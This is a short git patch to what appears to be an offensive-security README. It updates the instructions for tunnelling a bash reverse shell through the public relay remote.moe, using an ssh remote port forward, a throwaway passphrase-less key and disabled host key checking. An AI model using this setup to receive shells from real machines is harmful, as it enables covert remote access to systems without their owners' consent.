From 5c8fcb65551d45de5074853e78da1cfb20fb7329 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 15 Jun 2023 17:37:07 +0100 Subject: [PATCH] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index d93a579..f825aa6 100644 --- a/README.md +++ b/README.md @@ -958,7 +958,8 @@ It is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](h On your workstation: ```sh # First Terminal: -ssh -R31337:0:8080 -o StrictHostKeyChecking=no nokey@remote.moe +ssh-keygen -q -t rsa -N "" -f .r +ssh -i .r -R31337:0:8080 -o StrictHostKeyChecking=no nokey@remote.moe; rm -f .r # Note down the 'remote.moe' address which will look something like # uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe